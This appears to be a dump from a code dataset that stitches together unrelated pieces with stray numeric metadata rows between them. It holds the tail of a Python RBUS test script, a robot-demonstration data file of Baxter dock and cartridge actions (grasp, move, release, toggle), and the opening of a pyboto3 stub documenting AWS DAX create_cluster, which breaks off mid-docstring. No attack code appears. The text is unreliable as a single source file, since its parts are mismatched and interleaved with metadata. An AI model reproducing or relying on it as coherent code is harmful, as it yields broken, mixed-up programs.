#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "********** End of RBUS Close ****************"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1: Open the RBUS connection";
print "EXPECTED RESULT 1: rbus_open Should be success";
print "ACTUAL RESULT 1: rbus_open was Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : %s" %actualresult ;
print "********** End of RBUS Open ****************\n"
obj.unloadModule("rbus");
else:
print "Failed to load the module";
obj.setLoadModuleStatus("FAILURE");
print "Module loading failed";
| 57.644678
| 160
| 0.578585
| 3,620
| 38,449
| 6.055525
| 0.086188
| 0.031614
| 0.021349
| 0.024908
| 0.800283
| 0.779344
| 0.775375
| 0.758405
| 0.750103
| 0.728297
| 0
| 0.012292
| 0.331374
| 38,449
| 666
| 161
| 57.731231
| 0.8404
| 0.084528
| 0
| 0.773756
| 0
| 0
| 0.348916
| 0.042586
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.002262
| null | null | 0.432127
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
40d0362d4950a0645b84787b037c6a308b94b5c9
| 20,820
|
py
|
Python
|
copct-master/baxter_corpus/demo_swap_red_with_green_2.py
|
jhomble/electron435
|
2a94a901679a1ebbdeea01bb9e888d365d536bec
|
[
"MIT"
] | 4
|
2016-10-26T13:58:44.000Z
|
2018-11-13T13:03:52.000Z
|
copct-master/baxter_corpus/demo_swap_red_with_green_2.py
|
jhomble/electron435
|
2a94a901679a1ebbdeea01bb9e888d365d536bec
|
[
"MIT"
] | 4
|
2020-03-31T01:10:26.000Z
|
2020-03-31T03:06:28.000Z
|
copct-master/baxter_corpus/demo_swap_red_with_green_2.py
|
jhomble/electron435
|
2a94a901679a1ebbdeea01bb9e888d365d536bec
|
[
"MIT"
] | 1
|
2020-03-03T06:22:08.000Z
|
2020-03-03T06:22:08.000Z
|
demo = (
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"move arm and grasp",
(
2.000000,
"dock-body",
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","dock-body")),
),
"move grasped object",
(
2.000000,
"dock-case",
(
(1.000000, 0.000186, 0.000190, ),
(-0.000186, 1.000000, 0.000020, ),
(-0.000190, -0.000020, 1.000000, ),
),
(
(3.947806, ),
(-0.000092, ),
(0.001779, ),
),
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","dock-body")),
),
"release",
(
2.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"press dock toggle",
(
2.000000,
"dock-body_6_2",
2.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"press dock toggle",
(
2.000000,
"dock-body_7_2",
2.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"move arm and grasp",
(
2.000000,
"c2",
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","c2")),
),
"move arm and grasp",
(
1.000000,
"c3",
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("c3","c2")),
),
"move grasped object",
(
1.000000,
"dock-body_6_1",
(
(0.999970, -0.007745, -0.000978, ),
(0.007745, 0.999970, 0.000160, ),
(0.000977, -0.000168, 1.000000, ),
),
(
(-0.427073, ),
(0.006338, ),
(0.104651, ),
),
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("c3","c2")),
),
"release",
(
1.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","c2")),
),
"move grasped object",
(
2.000000,
"dock-body_7_1",
(
(0.999850, 0.017327, -0.000185, ),
(-0.017327, 0.999850, 0.000377, ),
(0.000191, -0.000373, 1.000000, ),
),
(
(-0.430730, ),
(-0.007425, ),
(0.370435, ),
),
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","c2")),
),
"release",
(
2.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"press dock toggle",
(
2.000000,
"dock-body_6_2",
1.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"press dock toggle",
(
2.000000,
"dock-body_7_2",
1.000000,
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","nothing")),
),
"move arm and grasp",
(
2.000000,
"dock-body",
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","dock-body")),
),
"move grasped object",
(
2.000000,
"dock-case",
(
(0.999997, -0.002430, 0.000087, ),
(0.002430, 0.999997, -0.000161, ),
(-0.000086, 0.000161, 1.000000, ),
),
(
(-0.090493, ),
(-0.005461, ),
(0.001495, ),
),
)
),
(
(
("workspace", "Workspace"),
("table", "Block"),
("dock-case", "DockCase"),
("dock-case_1", "Block"),
("dock-body", "DockDrawer"),
("dock-body_2", "DockFrontPanel"),
("dock-body_2_1", "Prism"),
("dock-body_2_2", "Block"),
("dock-body_2_3", "Block"),
("dock-body_4", "DockHandle"),
("dock-body_4_1", "Prism"),
("dock-body_4_2", "Prism"),
("dock-body_5", "DockModule"),
("dock-body_5_1", "DockSlot"),
("dock-body_5_2", "DockSwitch"),
("dock-body_5_3", "DockLED"),
("dock-body_6", "DockModule"),
("dock-body_6_1", "DockSlot"),
("c2", "Cartridge"),
("dock-body_6_2", "DockSwitch"),
("dock-body_6_3", "DockLED"),
("dock-body_7", "DockModule"),
("dock-body_7_1", "DockSlot"),
("c3", "Cartridge"),
("dock-body_7_2", "DockSwitch"),
("dock-body_7_3", "DockLED"),
("dock-body_8", "DockModule"),
("dock-body_8_1", "DockSlot"),
("dock-body_8_2", "DockSwitch"),
("dock-body_8_3", "DockLED"),
("dock-case_2", "Block"),
("dock-case_3", "Block"),
("dock-case_4", "Block"),
("dock-case_5", "Prism"),
("dock-case_6", "Block"),
("c5", "Cartridge"),
("c6", "Cartridge"),
("discard-bin", "Block"),
("gripping", ("nothing","dock-body")),
),
"release",
(
2.000000,
)
),
)
| 25.67201
| 40
| 0.564313
| 2,731
| 20,820
| 4.028195
| 0.027829
| 0.287974
| 0.054813
| 0.110535
| 0.963276
| 0.962822
| 0.96064
| 0.96064
| 0.96064
| 0.96064
| 0
| 0.072816
| 0.144476
| 20,820
| 810
| 41
| 25.703704
| 0.544801
| 0
| 0
| 0.874074
| 0
| 0
| 0.567867
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40e3d01010eb0f1e23a9b2d170b4652ca52171ed
| 110,182
|
py
|
Python
|
pyboto3/dax.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/dax.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/dax.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def create_cluster(ClusterName=None, NodeType=None, Description=None, ReplicationFactor=None, AvailabilityZones=None, SubnetGroupName=None, SecurityGroupIds=None, PreferredMaintenanceWindow=None, NotificationTopicArn=None, IamRoleArn=None, ParameterGroupName=None, Tags=None, SSESpecification=None):
"""
Creates a DAX cluster. All nodes in the cluster run the same DAX caching software.
See also: AWS API Documentation
Exceptions
:example: response = client.create_cluster(
ClusterName='string',
NodeType='string',
Description='string',
ReplicationFactor=123,
AvailabilityZones=[
'string',
],
SubnetGroupName='string',
SecurityGroupIds=[
'string',
],
PreferredMaintenanceWindow='string',
NotificationTopicArn='string',
IamRoleArn='string',
ParameterGroupName='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
SSESpecification={
'Enabled': True|False
}
)
:type ClusterName: string
:param ClusterName: [REQUIRED]\nThe cluster identifier. This parameter is stored as a lowercase string.\n\nConstraints:\n\nA name must contain from 1 to 20 alphanumeric characters or hyphens.\nThe first character must be a letter.\nA name cannot end with a hyphen or contain two consecutive hyphens.\n\n
:type NodeType: string
:param NodeType: [REQUIRED]\nThe compute and memory capacity of the nodes in the cluster.\n
:type Description: string
:param Description: A description of the cluster.
:type ReplicationFactor: integer
:param ReplicationFactor: [REQUIRED]\nThe number of nodes in the DAX cluster. A replication factor of 1 will create a single-node cluster, without any read replicas. For additional fault tolerance, you can create a multiple node cluster with one or more read replicas. To do this, set ReplicationFactor to a number between 3 (one primary and two read replicas) and 10 (one primary and nine read replicas). If the AvailabilityZones parameter is provided, its length must equal the ReplicationFactor .\n\nNote\nAWS recommends that you have at least two read replicas per cluster.\n\n
:type AvailabilityZones: list
:param AvailabilityZones: The Availability Zones (AZs) in which the cluster nodes will reside after the cluster has been created or updated. If provided, the length of this list must equal the ReplicationFactor parameter. If you omit this parameter, DAX will spread the nodes across Availability Zones for the highest availability.\n\n(string) --\n\n
:type SubnetGroupName: string
:param SubnetGroupName: The name of the subnet group to be used for the replication group.\n\nWarning\nDAX clusters can only run in an Amazon VPC environment. All of the subnets that you specify in a subnet group must exist in the same VPC.\n\n
:type SecurityGroupIds: list
:param SecurityGroupIds: A list of security group IDs to be assigned to each node in the DAX cluster. (Each of the security group ID is system-generated.)\nIf this parameter is not specified, DAX assigns the default VPC security group to each node.\n\n(string) --\n\n
:type PreferredMaintenanceWindow: string
